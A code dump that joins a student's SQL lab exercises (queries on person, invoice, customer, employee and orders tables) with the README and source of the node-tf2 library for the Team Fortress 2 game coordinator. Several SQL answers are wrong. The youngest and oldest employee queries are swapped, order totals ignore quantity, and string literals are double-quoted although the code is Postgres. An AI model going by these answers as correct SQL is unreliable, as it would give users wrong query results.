SELECT * FROM person WHERE favorite_color != "red" AND favorite_color != "blue";
-- Select all the person in the person table where their favorite color is orange or green.
SELECT * FROM person WHERE favorite_color = "orange" or favorite_color = "green";
-- Select all the person in the person table where their favorite color is orange, green or blue (use IN).
SELECT * FROM person WHERE favorite_color IN ('orange', 'green', 'blue');
-- Select all the person in the person table where their favorite color is yellow or purple (use IN).
SELECT * FROM person WHERE favorite_color IN ('yellow', 'purple');<file_sep>/group_by.sql
-- Find the sum of totals in the invoice table grouped by billing_state.
SELECT SUM(total) FROM invoice GROUP BY billing_state;
-- Find the average track length (in milliseconds) by album. Order the table by the averages.
SELECT title, AVG(milliseconds) AS avg_length FROM track FULL OUTER JOIN album ON track.album_id = album.album_id GROUP BY album.title;
-- Find a count of how many albums the artists with the ids 8 and 22 have respectively. Use COUNT, WHERE/IN, and GROUP BY.
SELECT title, COUNT(*) FROM album WHERE artist_id iN (8, 22) GROUP BY title;<file_sep>/update.sql
-- UPDATE table_name
-- SET column1 = value1, column2 = value2, ...
-- WHERE condition;
-- Find all customers with fax numbers and set those numbers to null.
UPDATE customer SET fax = null;
-- Find all customers with no company (null) and set their company to “Self”.
UPDATE customer SET company = 'Self' WHERE company IS NULL;
-- Find the customer <NAME> and change her last name to Thompson.
UPDATE customer SET last_name = 'Thompson' WHERE first_name = 'Julia' AND last_name = 'Barnett';
-- Find the customer with this email <EMAIL> and change his support rep to 4.
UPDATE customer SET support_rep_id = 4 WHERE email = '<EMAIL>';
-- Find all tracks that are the genre Metal and have no composer. Set the composer to “The darkness around us”.
SELECT * FROM genre WHERE genre_id = 3; -- To find the genre_id
UPDATE track SET composer = 'The darkness around us' WHERE genre_id = 3 AND composer IS NULL;
-- SELECT * FROM track LEFT JOIN genre ON track.genre_id = genre.genre_id WHERE genre.name = 'Metal' AND composer IS NULL;<file_sep>/employee.sql
-- List all employee first and last names only that live in Calgary.
SELECT first_name, last_name FROM employee WHERE city = 'Calgary';
-- Find the birthdate for the youngest employee.
SELECT birth_date FROM employee ORDER BY birth_date ASC LIMIT 1;
-- Find the birthdate for the oldest employee.
SELECT birth_date FROM employee ORDER BY birth_date DESC LIMIT 1;
-- Find everyone that reports to <NAME> (use the ReportsTo column).
SELECT * FROM employee WHERE reports_to = 2;
-- You will need to query the employee table to find the id for <NAME>
SELECT * FROM employee WHERE first_name = 'Nancy' AND last_name = 'Edwards';
-- id: 2
-- Count how many people live in Lethbridge.
SELECT COUNT(*) FROM employee WHERE city = "Lethbridge";<file_sep>/orders.sql
-- Create a table called orders that records: order_id, person_id, product_name, product_price, quantity.
CREATE TABLE orders (
id SERIAL PRIMARY KEY,
person_id INTEGER NOT NULL,
product_name VARCHAR(40),
product_price FLOAT,
quantity INTEGER
);
-- Add 5 orders to the orders table.
INSERT INTO orders (person_id, product_name, product_price, quantity)
VALUES
(1, "<NAME>", 14.99, 1),
(2, "iMac Desktop", 1299.99, 1),
(2, "Computer desk", 59.99, 2),
(1, "<NAME>", 10.99, 4),
(2, "Apple AirPods", 119.99, 1);
-- Make orders for at least two different people.
-- ✔️
-- person_id should be different for different people.
-- ✔️
-- Select all the records from the orders table.
SELECT * FROM orders;
-- Calculate the total number of products ordered.
SELECT COUNT(*) FROM orders;
-- Calculate the total order price.
SELECT SUM(product_price) FROM orders;
-- Calculate the total order price by a single person_id.
SELECT SUM(product_price) FROM orders WHERE person_id = 2; | d7514ec653aa39d1642ddca758f1f26a91380321 | [
"SQL"
] | 6 | SQL | ctdupuis/lab-sql-intro | 5830982f93c08dbb33476794353bd55f2a4c09a3 | 92c22e16f1e015df7942292eab7ace6da521923a |
refs/heads/master | <file_sep># Team Fortress 2 for Node.js
[](https://npmjs.com/package/tf2)
[](https://npmjs.com/package/tf2)
[](https://david-dm.org/DoctorMcKay/node-tf2)
[](https://github.com/DoctorMcKay/node-tf2/blob/master/LICENSE)
[](https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=N36YVAT42CZ4G&item_name=node%2dtf2¤cy_code=USD)
This module provides a very flexible interface for interacting with the [Team Fortress 2](http://store.steampowered.com)
Game Coordinator. It's designed to work with a [node-steam-user SteamUser](https://github.com/DoctorMcKay/node-steam-user) instance.
**You will need node-steam-user v4.2.0 or later and Node.js v8 or later to use node-tf2 v3.**
# Setup
First, install it from npm:
$ npm install tf2
Require the module and call its constructor with your SteamUser instance:
```js
const SteamUser = require('steam-user');
const TeamFortress2 = require('tf2');
let user = new SteamUser();
let tf2 = new TeamFortress2(user);
```
To initialize your GC connection, just launch TF2 via SteamUser normally:
```js
user.gamesPlayed([440]);
```
node-tf2 will emit a `connectedToGC` event when the game coordinator connection has been successfully established.
You shouldn't try to do anything before you receive that event.
# Enums
There are some enums that are used by various methods and events. You can find them in `enums.js`.
# Properties
There are a few useful read-only properties available to you.
### haveGCSession
`true` if we're currently connected to the GC, `false` otherwise. You should only call methods when we have an active GC session.
### itemSchema
After `itemSchemaLoaded` is emitted, this is the object representation of the parsed items_game.txt file. Before that point, this is undefined.
### backpack
After `backpackLoaded` is emitted, this is an array containing the contents of our backpack. Before that point, this is undefined.
### premium
`true` if this account is Premium, `false` if it's F2P. This value is defined right before `accountLoaded` is emitted.
### backpackSlots
The maximum number of items your backpack can hold. This value is defined right before `accountLoaded` is emitted.
### canSendProfessorSpeks
`true` if you can call `sendProfessorSpeks` to send the [Professor Speks](http://wiki.teamfortress.com/wiki/Professor_Speks) item to another user. This value is defined right before `accountLoaded` is emitted.
# Methods
### Constructor(steamClient)
When instantiating your node-tf2 instance, you need to pass your active SteamUser instance as the sole parameter, as shown here:
```js
let tf2 = new TeamFortress2(steamUser);
```
### setLang(localizationFile)
Call this method with the contents of an up-to-date localization file of your chosen language if you want localized events to be emitted. You can find the localization files under `tf/resource/tf_[language].txt`.
You can call this at any time, even when disconnected. If you get an updated localization file, you can call this again to update the cached version.
### craft(items[, recipe])
Craft `items` together into a new item, optionally using a specific `recipe`. The `recipe` parameter is optional and you don't normally need to specify it. `items` should be an array of item IDs to craft.
### removeItemPaint(item)
Removes item paint. `item` should be item's id
### removeCustomTexture(item)
Removes custom texture (war paints?). `item` should be item's id
### removeMakersMark(item)
Removes the crafter's name. `item` should be item's id
### removeItemKillstreak(item)
Removes the killstreaks from item. `item` should be item's id
### removeItemGiftedBy(item)
Removes the `Gifted by` attribute from item. `item` should be item's id
### removeItemFestivizer(item)
Removes the festivizer from item. `item` should be item's id
### requestInventoryRefresh()
Refresh TF2 inventory without leaving and entering game
**Not working (?)**
### trade(steamID)
Sends an in-game trade request to `steamID`. The other player must be playing TF2 currently. Listen for the `tradeResponse`
event for their response. If they accept, node-steam-user will emit
[`tradeRequest`](https://github.com/DoctorMcKay/node-steam-user#traderequest) and you can start the trade with
[node-steam-trade](https://github.com/seishun/node-steam-trade).
### cancelTradeRequest()
Cancels your current pending trade request. You can only send one trade request at a time so there is no need to pass any sort of identifier.
### respondToTrade(tradeID, accept)
Responds to an incoming trade request identified by `tradeID`. Pass `true` for `accept` to accept the trade request, or `false` to decline it.
### setStyle(item, style)
Sets the current `style` of an `item`. The `item` parameter should be an item ID, and the `style` parameter is the index of the desired style.
### setPosition(item, position)
Sets the `position` of an `item` in the backpack. The first slot on page 1 is position 1. `item` should be an item ID.
### deleteItem(item)
Deletes an `item`. The `item` parameter should be the ID of the item to delete. **This is a destructive operation.**
### wrapItem(wrapID, itemID)
Wraps the item with ID `itemID` using the gift wrap with ID `wrapID`.
### deliverGift(gift, steamID)
Sends a `gift` to a recipient with a `steamID`. The recipient doesn't need to be playing TF2. `gift` should be the ID of the wrapped gift item.
### unwrapGift(gift)
Unwraps a `gift`. The `gift` parameter should be the ID of a received wrapped gift item.
### useItem(item)
Generically use an item. The `item` parameter should be an item ID.
### sortBackpack(sortType)
Sorts your backpack. `sortType` is the ID of the type of sort you want.
`0`: No sort, `1`: By rarity, `2`: By type, `3`: By class, `4`: By slot, `5`: By date
### sendProfessorSpeks(steamID)
If you're premium and you haven't sent them yet, this will thank a "helpful user" and grant them [Professor Speks](http://wiki.teamfortress.com/wiki/Professor_Speks). If they already have Speks, this will increment their "New Users Helped" counter.
The `steamID` parameter should be the recipient's 64-bit steamID. The recipient does not need to be on your friends list or in-game.
### createServerIdentity()
Creates a new GC gameserver identity account ID and token. Equivalent to running cl_gameserver_create_identity in the TF2 console. Listen for the `createIdentity` event for a response.
### getRegisteredServers()
Requests a list of your GC gameserver identities. Equivalent to running cl_gameserver_list in the TF2 console. Listen for the `registeredServers` event for the response.
### resetServerIdentity(id)
Resets the token of the server identified by a given `id`. This will make the GC generate a new token, invaliding the old one. Listen for the `resetIdentity` event for the response.
### openCrate(keyID, crateID)
Opens a crate with `crateID` using a key with `keyID`. If successful, you'll get two `itemRemoved` events, one for the key and one for the crate, followed by an `itemAcquired` event for what you received.
### requestWarStats([warID][, callback])
- `warID` - A [war ID](https://github.com/DoctorMcKay/node-tf2/blob/3fa354b2c1224b5885d9b9eb2818d17f76454cd7/enums.js#L78-L80) (defaults to HeavyVsPyro)
- `callback` - Identical to [`warStats`](#warstats) event
Requests global stats for a particular War.
# Events
### connectedToGC
- `version` - The current version reported by the GC
Emitted when a GC connection is established. You shouldn't use any methods before you receive this. Note that this may be received (after it's first emitted) without any disconnectedFromGC event being emitted. In this case, the GC simply restarted.
### disconnectedFromGC
- `reason` - The reason why we disconnected from the GC. This value is one of the values in the `GCGoodbyeReason` enum. If the value is unknown, you'll get a string representation instead.
Emitted when we disconnect from the GC. You shouldn't use any methods until `connectedToGC` is emitted.
### itemSchema
- `version` - The current version of the schema as a hexadecimal string
- `itemsGameUrl` - The URL to the current items_game.txt
Emitted when we get an updated item schema from the GC. node-tf2 will automatically download and parse the updated items_game.txt and will emit `itemSchemaLoaded` when complete.
### itemSchemaLoaded
Emitted when the up-to-date items_game.txt has been downloaded and parsed. It's available as `tf2.itemSchema`.
### itemSchemaError
- `err` - The error that occurred
Emitted if there was an error when downloading items_game.txt.
### systemMessage
- `message` - The message that was broadcast
Emitted when a system message is sent by Valve. In the official client, this is displayed as a regular pop-up notification box and in chat, and is accompanied by a beeping sound.
System messages are broadcast rarely and usually concern item server (GC) downtime.
### displayNotification
- `title` - Notification title (currently unused)
- `body` - Notification body text
Emitted when a GC-to-client notification is sent. In the official client, this is displayed as a regular pop-up notification box. Currently, this is only used for broadcasting Something Special For Someone Special acceptance messages.
Notifications have a valid and non-empty `title`, but the official client doesn't display it.
**This won't be emitted unless you call `setLang` with a valid localization file.**
### itemBroadcast
- `message` - The message text that is rendered by clients. This will be `null` if you haven't called `setLang` with a valid localization file or if the schema isn't loaded.
- `username` - The name of the user that received/deleted an item
- `wasDestruction` - `true` if the user deleted their item, `false` if they received it
- `defindex` - The definition index of the item that was received/deleted
Emitted when an item broadcast notification is sent. In the official client, the `message` is displayed as a regular pop-up notification box. Currently, this is only used for broadcasting Golden Frying Pan drops/deletions.
### tradeRequest
- `steamID` - A [`SteamID`](https://www.npmjs.com/package/steamid) object of the user who sent a trade request
- `tradeID` - A unique numeric identifier that's used to respond to the request (via `respondToTrade`)
Emitted when someone sends us a trade request. Use `respondToTrade` to accept or decline it.
### tradeResponse
- `response` - The response code. This is a value in the `TradeResponse` enum.
- `tradeID` - If `response` is `TradeResponse.Cancel`, this is the tradeID of the trade request that was canceled.
Emitted when a response is received to a `trade` call, or someone cancels an incoming trade request.
### backpackLoaded
Emitted when the GC has sent us the contents of our backpack. From this point forward, backpack contents are available as a `tf2.backpack` property, which is an array of item objects. The array is in no particular order, use the `position` property of each item to determine its backpack slot.
### accountLoaded
Emitted when the GC has sent us metadata about our account. Right before this is emitted, node-tf2 will define the `premium`, `backpackSlots`, and `canSendProfessorSpeks` properties. This event indicates that those properties are now available.
### accountUpdate
- `oldData` - An object representing the previous value of whatever properties changed
Emitted when the GC notifies us that something about our account has changed. One or more of the `premium`, `backpackSlots`, or `canSendProfessorSpeks` properties will have changed right before this event is emitted. The previous value of whatever properties changed is available via `oldData`.
For example, if our account has just upgraded to premium, this would be `oldData`:
```json
{
"premium": false,
"backpackSlots": 50
}
```
The `premium` property of node-tf2 would now be true and the `backpackSlots` property would now be 300.
### itemAcquired
- `item` - The item that was acquired
Emitted when we receive a new item. `item` is the item that we just received, and `tf2.backpack` is updated before the event is emitted.
### itemChanged
- `oldItem` - The old item data
- `newItem` - The new item data
Emitted when an item in our backpack changes (e.g. style update, position changed, etc.).
### itemRemoved
- `item` - The item that was removed
Emitted when an item is removed from our backpack. The `tf2.backpack` property is updated before this is emitted.
### craftingComplete
- `recipe` - The ID of the recipe that was used to perform this craft, or -1 on failure
- `itemsGained` - An array of IDs of items that were gained as a result of this craft
Emitted when a craft initiated by the `craft` method finishes.
### professorSpeksReceived
- `steamID` - A [`SteamID`](https://www.npmjs.com/package/steamid) object of the user who sent us <NAME>
Emitted when someone else thanks us and sends us <NAME> (increments our "New Users Helped" counter if we already have them).
### professorSpeksSent
Emitted when we successfully send <NAME> to someone else.
### createIdentity
- `status` - The status of this request, from the values in the enum below.
- `created` - `true` if the identity was successfully created
- `id` - The ID of the newly-created identity
- `token` - The authentication token of the newly-created identity
Emitted when the GC sends us back the response of a `createServerIdentity()` call. The `status` value will be from the following enum:
enum EStatus {
kStatus_GenericFailure = 0;
kStatus_TooMany = -1;
kStatus_NoPrivs = -2;
kStatus_Created = 1;
}
### registeredServers
- `servers` - An array of objects representing our owned server identities
Emitted when the GC sends us back the response of a `getRegisteredServers()` call. Each item in the `servers` array will be an object that looks like this:
```json
{
"game_server_account_id": 291516,
"game_server_identity_token": "T<PASSWORD>",
"game_server_standing": 0,
"game_server_standing_trend": 2
}
```
### resetIdentity
- `reset` - `true` if the token was successfully reset
- `id` - The ID of the identity for which we reset the token
- `token` - The new token associated with the given ID
Emitted when the GC sends us back the response of a `resetServerIdentity(id)` call.
### warStats
- `scores` - An object where the keys are [side indexes](https://github.com/DoctorMcKay/node-tf2/blob/3fa354b2c1224b5885d9b9eb2818d17f76454cd7/enums.js#L82-L85) and values are scores.
Emitted when the GC sends us back the response of a `requestWarStats()` call.
<file_sep>const ByteBuffer = require('bytebuffer');
const EventEmitter = require('events').EventEmitter;
const SteamID = require('steamid');
const Util = require('util');
const VDF = require('vdf');
const Language = require('./language.js');
const Schema = require('./protobufs/generated/_load.js');
const STEAM_APPID = 440;
module.exports = TeamFortress2;
Util.inherits(TeamFortress2, EventEmitter);
function TeamFortress2(steam) {
if (steam.packageName != 'steam-user' || !steam.packageVersion || !steam.constructor) {
throw new Error('tf2 v3 only supports steam-user v4.2.0 or later.');
} else {
let parts = steam.packageVersion.split('.');
if (parts[0] < 4 || parts[1] < 2) {
throw new Error(`node-tf2 v3 only supports node-steam-user v4.2.0 or later. ${steam.constructor.name} v${steam.packageVersion} given.`);
}
}
this._steam = steam;
this.haveGCSession = false;
this._isInTF2 = false;
this._steam.on('receivedFromGC', (appid, msgType, payload) => {
if (appid != STEAM_APPID) {
return; // we don't care
}
let isProtobuf = !Buffer.isBuffer(payload);
let handler = null;
if (this._handlers[msgType]) {
handler = this._handlers[msgType];
}
let msgName = msgType;
for (let i in Language) {
if (Language.hasOwnProperty(i) && Language[i] == msgType) {
msgName = i;
break;
}
}
this.emit('debug', "Got " + (handler ? "handled" : "unhandled") + " GC message " + msgName + (isProtobuf ? " (protobuf)" : ""));
if (handler) {
handler.call(this, isProtobuf ? payload : ByteBuffer.wrap(payload, ByteBuffer.LITTLE_ENDIAN));
}
});
this._steam.on('appLaunched', (appid) => {
if (this._isInTF2) {
return; // we don't care if it was launched again
}
if (appid == STEAM_APPID) {
this._isInTF2 = true;
if (!this.haveGCSession) {
this._connect();
}
}
});
let handleAppQuit = (emitDisconnectEvent) => {
if (this._helloInterval) {
clearInterval(this._helloInterval);
this._helloInterval = null;
}
if (this.haveGCSession && emitDisconnectEvent) {
this.emit('disconnectedFromGC', TeamFortress2.GCGoodbyeReason.NO_SESSION);
}
this.haveGCSession = false;
};
this._steam.on('appQuit', (appid) => {
if (!this._isInTF2) {
return;
}
if (appid == STEAM_APPID) {
handleAppQuit(false);
}
});
this._steam.on('disconnected', () => {
handleAppQuit(true);
});
this._steam.on('error', (err) => {
handleAppQuit(true);
});
}
TeamFortress2.prototype._connect = function() {
if (!this._isInTF2 || this._helloInterval) {
return; // We're not in TF2 or we're already trying to connect
}
let sendHello = () => {
if (this.haveGCSession) {
clearInterval(this._helloInterval);
this._helloInterval = null;
return;
}
if (this._isServer()) {
this._send(Language.ServerHello, Schema.CMsgServerHello, {});
} else {
this._send(Language.ClientHello, Schema.CMsgClientHello, {});
}
};
this._helloInterval = setInterval(sendHello, 5000);
sendHello();
};
TeamFortress2.prototype._isServer = function() {
let serverTypes = [SteamID.Type.ANON_GAMESERVER, SteamID.Type.GAMESERVER];
return this._steam.steamID && serverTypes.includes(this._steam.steamID.type);
};
TeamFortress2.prototype._send = function(type, protobuf, body) {
if (!this._steam.steamID) {
return false;
}
let msgName = type;
for (let i in Language) {
if (Language[i] == type) {
msgName = i;
break;
}
}
this.emit('debug', "Sending GC message " + msgName);
if (protobuf) {
this._steam.sendToGC(STEAM_APPID, type, {}, protobuf.encode(body).finish());
} else {
// This is a ByteBuffer
this._steam.sendToGC(STEAM_APPID, type, null, body.flip().toBuffer());
}
return true;
};
TeamFortress2.prototype.setLang = function(langFile) {
let lang = VDF.parse(langFile);
// The vdf parser appears to add some random characters and quotes to the root 'lang' key, so we'll just use a loop to find it
for (let i in lang) {
this.lang = lang[i].Tokens;
}
};
TeamFortress2.prototype.craft = function(items, recipe) {
let buffer = new ByteBuffer(2 + 2 + (8 * items.length), ByteBuffer.LITTLE_ENDIAN);
buffer.writeInt16(recipe || -2); // -2 is wildcard
buffer.writeInt16(items.length);
for (let i = 0; i < items.length; i++) {
buffer.writeUint64(coerceToLong(items[i]));
}
this._send(Language.Craft, null, buffer);
};
TeamFortress2.prototype.trade = function(steamID) {
if (typeof steamID == 'string') {
steamID = new SteamID(steamID);
}
let buffer = new ByteBuffer(12, ByteBuffer.LITTLE_ENDIAN);
buffer.writeUint32(0);
buffer.writeUint64(coerceToLong(steamID.getSteamID64()));
this._send(Language.Trading_InitiateTradeRequest, null, buffer);
};
TeamFortress2.prototype.removeItemName = function(item){
//bool takes 1,item takes 8
let buffer = new ByteBuffer(9, ByteBuffer.LITTLE_ENDIAN);
buffer.writeUint64(item);
buffer.writeUint8(0); //set to false
this._send(Language.RemoveItemName, null, buffer);
};
TeamFortress2.prototype.removeItemDescription = function(item){
//bool takes 1,item takes 8
let buffer = new ByteBuffer(9, ByteBuffer.LITTLE_ENDIAN);
buffer.writeUint64(item);
buffer.writeUint8(0); //set to true for description
this._send(Language.RemoveItemName, null, buffer);
};
TeamFortress2.prototype.removeItemPaint = function(item){
this._send(Language.RemoveItemPaint, Schema.CMsgGCRemoveCustomizationAttributeSimple , {
"item_id": item
});
};
TeamFortress2.prototype.removeCustomTexture = function(item){
this._send(Language.RemoveCustomTexture, Schema.CMsgGCRemoveCustomizationAttributeSimple , {
"item_id": item
});
};
TeamFortress2.prototype.removeMakersMark = function(item){
this._send(Language.RemoveMakersMark, Schema.CMsgGCRemoveCustomizationAttributeSimple , {
"item_id": item
});
};
TeamFortress2.prototype.removeItemKillstreak = function(item){
this._send(Language.RemoveKillstreak, Schema.CMsgGCRemoveCustomizationAttributeSimple , {
"item_id": item
});
};
TeamFortress2.prototype.removeItemGiftedBy = function(item){
this._send(Language.RemoveItemGiftedBy, Schema.CMsgGCRemoveCustomizationAttributeSimple , {
"item_id": item
});
};
TeamFortress2.prototype.removeItemFestivizer = function(item){
this._send(Language.RemoveItemFestivizer, Schema.CMsgGCRemoveCustomizationAttributeSimple , {
"item_id": item
});
};
TeamFortress2.prototype.requestInventoryRefresh = function(){
this._send(Language.RequestInventoryRefresh, Schema.CMsgRequestInventoryRefresh, {});
};
TeamFortress2.prototype.cancelTradeRequest = function() {
let buffer = new ByteBuffer(0, ByteBuffer.LITTLE_ENDIAN);
this._send(Language.Trading_CancelSession, null, buffer);
};
TeamFortress2.prototype.respondToTrade = function(tradeID, accept) {
let buffer = new ByteBuffer(8, ByteBuffer.LITTLE_ENDIAN);
buffer.writeUint32(accept ? TeamFortress2.TradeResponse.Accepted : TeamFortress2.TradeResponse.Declined);
buffer.writeUint32(tradeID);
this._send(Language.Trading_InitiateTradeResponse, null, buffer);
};
TeamFortress2.prototype.setStyle = function(item, style) {
let buffer = new ByteBuffer(12, ByteBuffer.LITTLE_ENDIAN);
buffer.writeUint64(coerceToLong(item));
buffer.writeUint32(style);
this._send(Language.SetItemStyle, null, buffer);
};
TeamFortress2.prototype.setPosition = function(item, position) {
let buffer = new ByteBuffer(16, ByteBuffer.LITTLE_ENDIAN);
buffer.writeUint64(coerceToLong(item));
buffer.writeUint64(coerceToLong(position));
this._send(Language.SetSingleItemPosition, null, buffer);
};
TeamFortress2.prototype.setPositions = function(items) {
this._send(Language.SetItemPositions, Schema.CMsgSetItemPositions, {"item_positions": items});
};
TeamFortress2.prototype.deleteItem = function(item) {
let buffer = new ByteBuffer(8, ByteBuffer.LITTLE_ENDIAN);
buffer.writeUint64(coerceToLong(item));
this._send(Language.Delete, null, buffer);
};
TeamFortress2.prototype.wrapItem = function(wrapID, itemID) {
let buffer = new ByteBuffer(16, ByteBuffer.LITTLE_ENDIAN);
buffer.writeUint64(coerceToLong(wrapID));
buffer.writeUint64(coerceToLong(itemID));
this._send(Language.GiftWrapItem, null, buffer);
};
TeamFortress2.prototype.deliverGift = function(gift, steamID) {
if (typeof steamID == 'string') {
steamID = new SteamID(steamID);
}
let buffer = new ByteBuffer(16, ByteBuffer.LITTLE_ENDIAN);
buffer.writeUint64(coerceToLong(gift));
buffer.writeUint64(coerceToLong(steamID.getSteamID64()));
this._send(Language.DeliverGift, null, buffer);
};
TeamFortress2.prototype.unwrapGift = function(gift) {
let buffer = new ByteBuffer(8, ByteBuffer.LITTLE_ENDIAN);
buffer.writeUint64(coerceToLong(gift));
this._send(Language.UnwrapGiftRequest, null, buffer);
};
TeamFortress2.prototype.useItem = function(item) {
this._send(Language.UseItemRequest, Schema.CMsgUseItem, {"item_id": item});
};
TeamFortress2.prototype.sortBackpack = function(sortType) {
this._send(Language.SortItems, Schema.CMsgSortItems, {"sort_type": sortType});
};
TeamFortress2.prototype.sendProfessorSpeks = function(steamID) {
if (typeof steamID == 'string') {
steamID = new SteamID(steamID);
}
this._send(Language.FreeTrial_ChooseMostHelpfulFriend, Schema.CMsgTFFreeTrialChooseMostHelpfulFriend, {"account_id_friend": steamID.accountid});
};
TeamFortress2.prototype.createServerIdentity = function() {
this._send(Language.GameServer_CreateIdentity, Schema.CMsgGC_GameServer_CreateIdentity, {"account_id": this._steam.steamID.accountid});
};
TeamFortress2.prototype.getRegisteredServers = function() {
this._send(Language.GameServer_List, Schema.CMsgGC_GameServer_List, {"account_id": this._steam.steamID.accountid});
};
TeamFortress2.prototype.resetServerIdentity = function(id) {
this._send(Language.GameServer_ResetIdentity, Schema.CMsgGC_GameServer_ResetIdentity, {"game_server_account_id": id});
};
TeamFortress2.prototype.openCrate = function(keyID, crateID) {
let buffer = new ByteBuffer(16, ByteBuffer.LITTLE_ENDIAN);
buffer.writeUint64(coerceToLong(keyID));
buffer.writeUint64(coerceToLong(crateID));
this._send(Language.UnlockCrate, null, buffer);
};
TeamFortress2.prototype.equipItem = function(itemID, classID, slot) {
this._send(Language.AdjustItemEquippedState, Schema.CMsgAdjustItemEquippedState, {
"item_id": itemID,
"new_class": classID,
"new_slot": slot
});
};
TeamFortress2.prototype.requestWarStats = function(warID, callback) {
if (typeof warID === 'function') {
callback = warID;
warID = null;
}
this._send(Language.War_RequestGlobalStats, Schema.CGCMsgGC_War_RequestGlobalStats, {"war_id": warID || TeamFortress2.War.HeavyVsPyro});
if (callback) {
this.once('warStats', callback);
}
};
TeamFortress2.prototype._handlers = {};
function coerceToLong(num, signed) {
return typeof num === 'string' ? new ByteBuffer.Long.fromString(num, !signed, 10) : num;
}
require('./enums.js');
require('./handlers.js');
<file_sep>// This file contains representations of message IDs
module.exports = {
// ESOMsg
SO_Create: 21,
SO_Update: 22,
SO_Destroy: 23,
SO_CacheSubscribed: 24,
SO_CacheUnsubscribed: 25,
SO_UpdateMultiple: 26,
SO_CacheSubscriptionCheck: 27,
SO_CacheSubscriptionRefresh: 28,
SO_CacheSubscribedUpToDate: 29,
// EGCItemMsg
Base: 1000,
SetSingleItemPosition: 1001,
Craft: 1002,
CraftResponse: 1003,
Delete: 1004,
VerifyCacheSubscription: 1005,
NameItem: 1006,
UnlockCrate: 1007,
UnlockCrateResponse: 1008,
PaintItem: 1009,
PaintItemResponse: 1010,
GoldenWrenchBroadcast: 1011,
MOTDRequest: 1012,
MOTDRequestResponse: 1013,
NameBaseItem: 1019,
NameBaseItemResponse: 1020,
RemoveSocketItem_DEPRECATED: 1021,
RemoveSocketItemResponse_DEPRECATED: 1022,
CustomizeItemTexture: 1023,
CustomizeItemTextureResponse: 1024,
UseItemRequest: 1025,
UseItemResponse: 1026,
RespawnPostLoadoutChange: 1029,
RemoveItemName: 1030,
RemoveItemPaint: 1031,
GiftWrapItem: 1032,
GiftWrapItemResponse: 1033,
DeliverGift: 1034,
DeliverGiftResponseReceiver: 1036,
UnwrapGiftRequest: 1037,
UnwrapGiftResponse: 1038,
SetItemStyle: 1039,
UsedClaimCodeItem: 1040,
SortItems: 1041,
RevolvingLootList_DEPRECATED: 1042,
LookupAccount: 1043,
LookupAccountResponse: 1044,
LookupAccountName: 1045,
LookupAccountNameResponse: 1046,
UpdateItemSchema: 1049,
RequestInventoryRefresh: 1050,
RemoveCustomTexture: 1051,
RemoveCustomTextureResponse: 1052,
RemoveMakersMark: 1053,
RemoveMakersMarkResponse: 1054,
RemoveUniqueCraftIndex: 1055,
RemoveUniqueCraftIndexResponse: 1056,
SaxxyBroadcast: 1057,
BackpackSortFinished: 1058,
AdjustItemEquippedState: 1059,
CollectItem: 1061,
ItemAcknowledged: 1062,
Presets_SelectPresetForClass: 1063,
Presets_SetItemPosition: 1064,
ReportAbuse: 1065,
ReportAbuseResponse: 1066,
Presets_SelectPresetForClassReply: 1067,
NameItemNotification: 1068,
ClientDisplayNotification: 1069,
ApplyStrangePart: 1070,
IncrementKillCountAttribute: 1071,
IncrementKillCountResponse: 1072,
RemoveStrangePart: 1073,
ResetStrangeScores: 1074,
GiftedItems: 1075,
ApplyUpgradeCard: 1077,
RemoveUpgradeCard: 1078,
ApplyStrangeRestriction: 1079,
ClientRequestMarketData: 1080,
ClientRequestMarketDataResponse: 1081,
ApplyXifier: 1082,
ApplyXifierResponse: 1083,
TrackUniquePlayerPairEvent: 1084,
FulfillDynamicRecipeComponent: 1085,
FulfillDynamicRecipeComponentResponse: 1086,
SetItemEffectVerticalOffset: 1087,
SetHatEffectUseHeadOrigin: 1088,
ItemEaterRecharger: 1089,
ItemEaterRechargerResponse: 1090,
ApplyBaseItemXifier: 1091,
ApplyClassTransmogrifier: 1092,
ApplyHalloweenSpellbookPage: 1093,
RemoveKillStreak: 1094,
RemoveKillStreakResponse: 1095,
TFSpecificItemBroadcast: 1096,
IncrementKillCountAttribute_Multiple: 1097,
DeliverGiftResponseGiver: 1098,
SetItemPositions: 1100,
LookupMultipleAccountNames: 1101,
LookupMultipleAccountNamesResponse: 1102,
TradingBase: 1500,
Trading_InitiateTradeRequest: 1501,
Trading_InitiateTradeResponse: 1502,
Trading_StartSession: 1503,
Trading_SessionClosed: 1509,
Trading_CancelSession: 1510,
Trading_InitiateTradeRequestResponse: 1514,
ServerBrowser_FavoriteServer: 1601,
ServerBrowser_BlacklistServer: 1602,
ServerRentalsBase: 1700,
ItemPreviewCheckStatus: 1701,
ItemPreviewStatusResponse: 1702,
ItemPreviewRequest: 1703,
ItemPreviewRequestResponse: 1704,
ItemPreviewExpire: 1705,
ItemPreviewExpireNotification: 1706,
ItemPreviewItemBoughtNotification: 1708,
Dev_NewItemRequest: 2001,
Dev_NewItemRequestResponse: 2002,
Dev_DebugRollLootRequest: 2003,
StoreGetUserData: 2500,
StoreGetUserDataResponse: 2501,
StorePurchaseInit_DEPRECATED: 2502,
StorePurchaseInitResponse_DEPRECATED: 2503,
StorePurchaseFinalize: 2512,
StorePurchaseFinalizeResponse: 2513,
StorePurchaseCancel: 2514,
StorePurchaseCancelResponse: 2515,
StorePurchaseQueryTxn: 2508,
StorePurchaseQueryTxnResponse: 2509,
StorePurchaseInit: 2510,
StorePurchaseInitResponse: 2511,
GCToGCDirtySDOCache: 2516,
GCToGCDirtyMultipleSDOCache: 2517,
GCToGCUpdateSQLKeyValue: 2518,
GCToGCBroadcastConsoleCommand: 2521,
ServerVersionUpdated: 2522,
ApplyAutograph: 2523,
GCToGCWebAPIAccountChanged: 2524,
RequestAnnouncements: 2525,
RequestAnnouncementsResponse: 2526,
RequestPassportItemGrant: 2527,
ClientVersionUpdated: 2528,
ItemPurgatory_FinalizePurchase: 2531,
ItemPurgatory_FinalizePurchaseResponse: 2532,
ItemPurgatory_RefundPurchase: 2533,
ItemPurgatory_RefundPurchaseResponse: 2534,
GCToGCPlayerStrangeCountAdjustments: 2535,
RequestStoreSalesData: 2536,
RequestStoreSalesDataResponse: 2537,
RequestStoreSalesDataUpToDateResponse: 2538,
GCToGCPingRequest: 2539,
GCToGCPingResponse: 2540,
GCToGCGetUserSessionServer: 2541,
GCToGCGetUserSessionServerResponse: 2542,
GCToGCGetUserServerMembers: 2543,
GCToGCGetUserServerMembersResponse: 2544,
GCToGCGrantSelfMadeItemToAccount: 2555,
GCToGCThankedByNewUser: 2556,
ShuffleCrateContents: 2557,
RemoveItemGiftedBy: 2570,
RemoveItemFestivizer: 2572,
